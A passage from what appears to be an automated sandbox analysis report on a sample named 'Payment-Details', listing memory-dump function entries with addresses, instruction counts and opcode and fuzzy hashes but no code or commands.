                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16ea03da74f11f9b3b5a91590cec6fec8736cc41bc915a0f50069b81189ee5e7
                                        • Instruction ID: 8c20cce8efaadb2030b973402ea7f857f994aaec78acf78c19f34a37471e4b44
                                        • Opcode Fuzzy Hash: 16ea03da74f11f9b3b5a91590cec6fec8736cc41bc915a0f50069b81189ee5e7
                                        • Instruction Fuzzy Hash: 41A1F0B5B112069FDB05CFA4D494AADBBF6EF88311F15816AE811EB390CB39DD41CB60
                                        Function 07071598 Relevance: .2, Instructions: 231COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692426534.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7070000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58c9e670eb1362590e3bae10ca807fa1cd20f66ab3f85b50d5715cee2ecb4865
                                        • Instruction ID: 3149a56e82d811289e417f3f9202a77f27c77c80703917140b31e0f433f96774
                                        • Opcode Fuzzy Hash: 58c9e670eb1362590e3bae10ca807fa1cd20f66ab3f85b50d5715cee2ecb4865
                                        • Instruction Fuzzy Hash: 38A1D2B4E0020DCFCB58DFA5D4486ADBBB6FF89301F548269D81277290CB785982CF95
                                        Function 07232E72 Relevance: .2, Instructions: 225COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57d5f3ee6da0c6307ee97a0056ad51c626e607ed9a7f074dc0514e51caefe080
                                        • Instruction ID: 06ad9799125dc4a38d9b90e83e79a218ae8aafed90e7e163f32a27d585d7a4f0
                                        • Opcode Fuzzy Hash: 57d5f3ee6da0c6307ee97a0056ad51c626e607ed9a7f074dc0514e51caefe080
                                        • Instruction Fuzzy Hash: 03A1D974A11209DFCB04EFA4E49499DBBB6FF89311F108269F802AB364DB34AD46CB51
                                        Function 070EF8D0 Relevance: .2, Instructions: 224COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 506d9509850adc959bca758484c7542723881b48faeccef44c408975db0bea22
                                        • Instruction ID: 26d47b7a129b8e4139196126223514ed78261f8af0540e8f72377dd1f0093877
                                        • Opcode Fuzzy Hash: 506d9509850adc959bca758484c7542723881b48faeccef44c408975db0bea22
                                        • Instruction Fuzzy Hash: 49A11D74A10219DFCB44EFA4D898A9DB7B6FF88300F158659E805AB365DB34FD42CB81
                                        Function 019F4E2C Relevance: .2, Instructions: 224COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2bc1b0ce4d90271a8a946e4c9fd12040d5a3c57a9cc73b1a3983f516384699c6
                                        • Instruction ID: 416233bd0ffab90efc5ef3ab198081f1b5e29ed5e1da927c6f627b880668f093
                                        • Opcode Fuzzy Hash: 2bc1b0ce4d90271a8a946e4c9fd12040d5a3c57a9cc73b1a3983f516384699c6
                                        • Instruction Fuzzy Hash: 1E915F31A00709EFDB04DFA9C854A9DBBB5FF88311F21856DE509AB361DB31AD45CB50
                                        Function 07233550 Relevance: .2, Instructions: 223COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21e03a0f93e9c34a2577ed49cc92dfe51bc93e33ac7b5d4599c5f93798d04aa9
                                        • Instruction ID: a1b35f6768c86fe54181bd31078ecaadb71fc6de98800b76beb4ada65ff45991
                                        • Opcode Fuzzy Hash: 21e03a0f93e9c34a2577ed49cc92dfe51bc93e33ac7b5d4599c5f93798d04aa9
                                        • Instruction Fuzzy Hash: 64816CB4B20615DFCB04DF68D494A6DB7B6BF89710F148169E406DB3A6CB34ED02CB90
                                        Function 07237990 Relevance: .2, Instructions: 217COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9230a6579f0c4f3c016777185a39632618c090f341bee792b806f50219b78947
                                        • Instruction ID: 7f4f8ccd1acb0c201018074830cee4d54ff3e852d1ed7f378ba7a8eabd7df2c6
                                        • Opcode Fuzzy Hash: 9230a6579f0c4f3c016777185a39632618c090f341bee792b806f50219b78947
                                        • Instruction Fuzzy Hash: 89718BF0A1060A8FDB14DFA9C9806AEFBF6FFC8300F248569D459A7754DB30AA01CB51
                                        Function 07234700 Relevance: .2, Instructions: 209COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04ec46996f3060f43e133d1c5c70b0660d684948fb131cb94a7c517ddfe7032e
                                        • Instruction ID: a05e9f543d98afbbb3f2d9cef58eccdf6a201c78a5436a217b710c1786295b9c
                                        • Opcode Fuzzy Hash: 04ec46996f3060f43e133d1c5c70b0660d684948fb131cb94a7c517ddfe7032e
                                        • Instruction Fuzzy Hash: 937102B1A10246CFC704EF68C8959BABBF1FF86304B1545A9D445DB361DB38ED41CB91
                                        Function 070EC5F8 Relevance: .2, Instructions: 208COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5418d46d4cb00e74b75ca33beb6ce20c8b057d6becdc401b3b88ce5eda1367a0
                                        • Instruction ID: 4223c6e85ccf392edd70755758f6219e8e8d07853140c6e24302c938e9a8035d
                                        • Opcode Fuzzy Hash: 5418d46d4cb00e74b75ca33beb6ce20c8b057d6becdc401b3b88ce5eda1367a0
                                        • Instruction Fuzzy Hash: 9D8129B5A00215CFDB54DF68C584A9EB7F9FF88710B1582A9E856DB360DB31EC41CBA0
                                        Function 066F0006 Relevance: .2, Instructions: 204COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc4cf9f233258c7261466a3e40d24ad40df31b59a6445a8e82988a0c1e9ef094
                                        • Instruction ID: b4b8310bfa4a1ee4d001019a3ee2e814369b827c6a1cb803b9844b8f8cd90792
                                        • Opcode Fuzzy Hash: fc4cf9f233258c7261466a3e40d24ad40df31b59a6445a8e82988a0c1e9ef094
                                        • Instruction Fuzzy Hash: 399155B1D15218CFDB50CFA4C855BEEBBB1FB4A300F1090AAD549A7352C7785A86CFA1
                                        Function 066F0040 Relevance: .2, Instructions: 198COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80d2e91396f9abd2f6c59d56e5bc35b92ecd5ac0ece07685dc5955d352292c6e
                                        • Instruction ID: 8dbad58342c17a18bae10de17e6b5c29e3bbd6bc2cf5d8395bcb3b7975f7e758
                                        • Opcode Fuzzy Hash: 80d2e91396f9abd2f6c59d56e5bc35b92ecd5ac0ece07685dc5955d352292c6e
                                        • Instruction Fuzzy Hash: 2E9147B0E11218CFDB50CFA4D855BAEBBB1FB49300F10916ADA49A7352CB785986CF91
                                        Function 0725D878 Relevance: .2, Instructions: 188COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 374768be07fc49f1a5f64fbb05eb02cb32b6dc97fb85f3e83775d31846e5c198
                                        • Instruction ID: 511f1850b67f920b4435f055f262f698d2295771071aa2c1f1207f432ca1b28a
                                        • Opcode Fuzzy Hash: 374768be07fc49f1a5f64fbb05eb02cb32b6dc97fb85f3e83775d31846e5c198
                                        • Instruction Fuzzy Hash: 15519BB07042019FDB15AB74C89462EB7A6EF8A300B24896DD846DB3A5DF35DC06CBA1
                                        Function 066F0464 Relevance: .2, Instructions: 174COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 71c66596b7295bb2408ac66774a6eb1ffb0959ff31ee4ea50a2e590401b3df8f
                                        • Instruction ID: 72d318e91e56c7f97e003d03fedd27641618b1abea80430ad7c163ca52f7b2fa
                                        • Opcode Fuzzy Hash: 71c66596b7295bb2408ac66774a6eb1ffb0959ff31ee4ea50a2e590401b3df8f
                                        • Instruction Fuzzy Hash: 298135B4E10218CFDB50CFA4D855BAEBBF1FB49300F10916ADA49A7352D7789982CF91
                                        Function 019F07C4 Relevance: .2, Instructions: 174COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bdd7d4a1668830d7ba05995538ec4850f89312c150177dec071f4aeb3ca18e2
                                        • Instruction ID: 265e325664306c0d03323b5842a0be53fd055ccb911044f9ee630ae4be0cbe68
                                        • Opcode Fuzzy Hash: 0bdd7d4a1668830d7ba05995538ec4850f89312c150177dec071f4aeb3ca18e2
                                        • Instruction Fuzzy Hash: 3D51E330B042069FDB05ABBD9854A6FBBEBFFC8321B158429E51ADB395DF709C018791
                                        Function 070EB5D0 Relevance: .2, Instructions: 173COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 265fb3b717e327ee00203febcb10dc336b717f0c2a918f08f40d6b94ddd18f23
                                        • Instruction ID: 717eb6fe5446c7437d9be69b72ce1f2bd5798ba5d7d1349ca3f6b75adb8649ad
                                        • Opcode Fuzzy Hash: 265fb3b717e327ee00203febcb10dc336b717f0c2a918f08f40d6b94ddd18f23
                                        • Instruction Fuzzy Hash: D171CEB0D05209CFDB04CFA9D948BAEBBFAFB89304F10812AD515B7250DB785A85CF51
                                        Function 066F019D Relevance: .2, Instructions: 170COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6367fa1a4bc77e9642cc6e421389d0cd9ec448d122f0e0f92bec3aece0431a5a
                                        • Instruction ID: 631abd6092d18e45227ee22448a02e1f367d5d1fcbd4b01c3a115bfd3137187c
                                        • Opcode Fuzzy Hash: 6367fa1a4bc77e9642cc6e421389d0cd9ec448d122f0e0f92bec3aece0431a5a
                                        • Instruction Fuzzy Hash: 907158B1D11218CFDB50CFA4D855BEEBBB1FB4A300F1091AACA49A7352C7785986CF91
                                        Function 066F01D4 Relevance: .2, Instructions: 168COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d5e4bfe18d594fcecdde0c0a1a569b8598567c9e95d572276e5a1fcbd62cb0fa
                                        • Instruction ID: 501fa61efa92cfa4f00f79dd89db9b8f209963cad5f7a2a228fa93ec41c1050b
                                        • Opcode Fuzzy Hash: d5e4bfe18d594fcecdde0c0a1a569b8598567c9e95d572276e5a1fcbd62cb0fa
                                        • Instruction Fuzzy Hash: CC7166B0D10218CFDB50CFA4D855BAEBBB1FB49300F109069DA49A7352C7789D86CF91
                                        Function 070E2FE1 Relevance: .2, Instructions: 167COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d279583f24d947daa63ac98cc33dcdc0d748e49cb11a125180c5b6b81e579bc
                                        • Instruction ID: 53e90f6d7116f4a0c656549646e1c8ed2fc28865b2031851e5fb439f3d32c0b3
                                        • Opcode Fuzzy Hash: 0d279583f24d947daa63ac98cc33dcdc0d748e49cb11a125180c5b6b81e579bc
                                        • Instruction Fuzzy Hash: 835130B0E15209CFDB04CFA9C5587EEFBF9BB8A310F1092AAC529B3251D3350A45CB54
                                        Function 0725A970 Relevance: .2, Instructions: 166COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b4528667d04917878cfad897ac746102a5220712fca4ffbbdd458469f024b6c
                                        • Instruction ID: 830e9ee42e415d747622b55172c48ba4d669ac38f40f04c0b047acf1c73a7dbb
                                        • Opcode Fuzzy Hash: 1b4528667d04917878cfad897ac746102a5220712fca4ffbbdd458469f024b6c
                                        • Instruction Fuzzy Hash: CE51D471A006168FCB11CF68D484AAAFBB5FF89320B15C296E9599B341D730F892CBD4
                                        Function 07233542 Relevance: .2, Instructions: 166COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ffd2e010dbadffe172c31e214365e1295e163f54320f3f2f5164b853abfee15d
                                        • Instruction ID: a09d473a1511e75d76bdba574889f3983018bf08482c326063c28d5ab37441ea
                                        • Opcode Fuzzy Hash: ffd2e010dbadffe172c31e214365e1295e163f54320f3f2f5164b853abfee15d
                                        • Instruction Fuzzy Hash: C96129B5B20615DFCB04DF68C494AADBBB6BF89710F158169E406DB366CB30ED42CB90
                                        Function 066F0140 Relevance: .2, Instructions: 162COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd21a73618b5469ebaded23df1ff96b77ee3ffd06592cdb968d36d665893bd11
                                        • Instruction ID: 7312b563775fb1f6c410df491fce3991d3a03a59dfd9cec4b70b0e6f974f09a1
                                        • Opcode Fuzzy Hash: dd21a73618b5469ebaded23df1ff96b77ee3ffd06592cdb968d36d665893bd11
                                        • Instruction Fuzzy Hash: 757125B0D11218CFDB90CFA4D855BAEBBB1FB49300F1091A9DA49A7352C7785D86CF91
                                        Function 066F04CC Relevance: .2, Instructions: 158COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70ac5ecc4eafb93fe6aab27665f67eb7c657d26a2b871f8a91f2f9a1f1b32ca9
                                        • Instruction ID: 006e476c181b6080c6574ad652d12e4d561b97372cbbeffe518bb6dfac708588
                                        • Opcode Fuzzy Hash: 70ac5ecc4eafb93fe6aab27665f67eb7c657d26a2b871f8a91f2f9a1f1b32ca9
                                        • Instruction Fuzzy Hash: 8D7157B0D11218CFDB50CFA4D855BEEBBB1FB49300F1091AADA49A7352C7785986CF91
                                        Function 0725B850 Relevance: .2, Instructions: 157COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42b0731d973875515894927728c2319caab97231efe054a52b9967aa434de8ec
                                        • Instruction ID: d76c81023c939724d4ec138016ce14f7696249a47a20d975545d08c9ac62e091
                                        • Opcode Fuzzy Hash: 42b0731d973875515894927728c2319caab97231efe054a52b9967aa434de8ec
                                        • Instruction Fuzzy Hash: DE517E757002058FCB04DB69D494AAEBBF6FFC9610B1581A9EA05DB361DB31ED01CB91
                                        Function 019F5CF4 Relevance: .2, Instructions: 157COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c30150b327bc0d20641499cce82a3295d653d35988852a629c068c540933b92
                                        • Instruction ID: 0d72fdc5b1e3cb97dcb9cd44e51ce5779133f99ab0a7589154e33929684a6c43
                                        • Opcode Fuzzy Hash: 8c30150b327bc0d20641499cce82a3295d653d35988852a629c068c540933b92
                                        • Instruction Fuzzy Hash: A4612C31A00709DFDB14DFA9C454A9DBBF2FF88315F218169E909AB364DB71AD85CB40
                                        Function 072599B8 Relevance: .2, Instructions: 155COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7dbd59e143291355b39e9e7584eac426b2a36f2f518450e6e697a31233436ff2
                                        • Instruction ID: 446a87bcdcedf521571a276cd677fb94018935f926ac8d7851108ecc77972a65
                                        • Opcode Fuzzy Hash: 7dbd59e143291355b39e9e7584eac426b2a36f2f518450e6e697a31233436ff2
                                        • Instruction Fuzzy Hash: 82514C76600104EFCB459FA8D844E69BBB7FF8D310B158098E6099B272DB32DC61EB91
                                        Function 070EAFBB Relevance: .2, Instructions: 155COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 656c785c3a567298853eaf0e04f623b8fa7797fe68ca6d63fe0b0545386c2ad9
                                        • Instruction ID: 58cf19f68338014baf1d21aca09c00b3ace207e0461dbefa02ec10e42a0deecb
                                        • Opcode Fuzzy Hash: 656c785c3a567298853eaf0e04f623b8fa7797fe68ca6d63fe0b0545386c2ad9
                                        • Instruction Fuzzy Hash: 8B6116F0A05249CFDB60CFA4C985BADBBFAFF49300F1082AAC519AB251DB745984CF40
                                        Function 066F024B Relevance: .2, Instructions: 152COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44e320b7d9a6fd18aad5631ba03f88d2e80b7cbdd6b63fe8101159c3fe00031c
                                        • Instruction ID: 7407d482c065351c106165edfdaf7ea9bd4abb26a5429394cac12595cc5f1dbe
                                        • Opcode Fuzzy Hash: 44e320b7d9a6fd18aad5631ba03f88d2e80b7cbdd6b63fe8101159c3fe00031c
                                        • Instruction Fuzzy Hash: A26147B0D11218CFDB50CFA4D855BEEBBB1FB4A300F1091AADA49A7352C7785986CF91
                                        Function 066F00C0 Relevance: .2, Instructions: 152COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f7a75e531e8254cfc50c18f47166a81f1b6b8e8989e3208f2048c616528963a4
                                        • Instruction ID: 3cf9dfcdccb814cc271873dcdc084ea9c0bb72483398df8a04d77f5ee184a3e7
                                        • Opcode Fuzzy Hash: f7a75e531e8254cfc50c18f47166a81f1b6b8e8989e3208f2048c616528963a4
                                        • Instruction Fuzzy Hash: 726136B0D11218CFDB50CFA4D855BEEBBB1FB4A300F1091A9CA49A7252C7785A86CF91
                                        Function 019F0798 Relevance: .2, Instructions: 152COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f5a9590d064e87b65bca950397829989e7e846a42fceb2b437ca697f3face9b
                                        • Instruction ID: a3b376d46aa012878b994077efb17eb1af6a8be179dcc277fc4d3a4535a80f4a
                                        • Opcode Fuzzy Hash: 5f5a9590d064e87b65bca950397829989e7e846a42fceb2b437ca697f3face9b
                                        • Instruction Fuzzy Hash: 1A412C31D093419FDB02DB78D8544AEBFBAEF82324B0A41DAE548DB253D6349C05CB92
                                        Function 019F5D68 Relevance: .2, Instructions: 151COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0256813f2d9be54e7af99140936000e176f63fea01c2ab9c66029eed81857ce1
                                        • Instruction ID: b33f11fa328a2ab2ea6663075e1b9a4c043958b207dfb06e819a849adb94d908
                                        • Opcode Fuzzy Hash: 0256813f2d9be54e7af99140936000e176f63fea01c2ab9c66029eed81857ce1
                                        • Instruction Fuzzy Hash: CC512A30A0070ADFDB14DFA9C858A9DBBF6FF88314F218159E509AB360DB70AD81CB40
                                        Function 072333B8 Relevance: .1, Instructions: 146COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b37e7bfd45d6b6e48a0f7b46fa25449af087ab22516325d3025126dfef248519
                                        • Instruction ID: 6e4a9b28adb3c4e89f627caae8918d5065e78e0aaa431239ee1f6b57e28c0884
                                        • Opcode Fuzzy Hash: b37e7bfd45d6b6e48a0f7b46fa25449af087ab22516325d3025126dfef248519
                                        • Instruction Fuzzy Hash: 48518276714240AFDB069F68D814E597FB6EF89320B1680E6E609CF272CA36DC11DB51
                                        Function 0725A3C1 Relevance: .1, Instructions: 144COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f65e68e05e1cd7a18107a1ff8c19026277f390e02e76fbaab7ae27216d8dd91
                                        • Instruction ID: 4738492146c2b307a463115d6c325638057fb75311fbec3db4950808176b6191
                                        • Opcode Fuzzy Hash: 5f65e68e05e1cd7a18107a1ff8c19026277f390e02e76fbaab7ae27216d8dd91
                                        • Instruction Fuzzy Hash: 9451F1B12147418FD325DF69D85435ABBF2AF85310F10C76ED88A8B791DB38D849CB61
                                        Function 070EF4B0 Relevance: .1, Instructions: 143COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 26347d7311fc4f0d99fdf775c727bf08fff423354bd807084aaf1bbb76c10edf
                                        • Instruction ID: 50c5e7396a4d2102da17f3f4d552c8302bf291707b4719619b3b5c8bb0b8edc9
                                        • Opcode Fuzzy Hash: 26347d7311fc4f0d99fdf775c727bf08fff423354bd807084aaf1bbb76c10edf
                                        • Instruction Fuzzy Hash: 12514135B1060A9FCB04DF64E459AAEB7BAFF88711F108219E50297364DF78A906CB91
                                        Function 07231F68 Relevance: .1, Instructions: 134COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
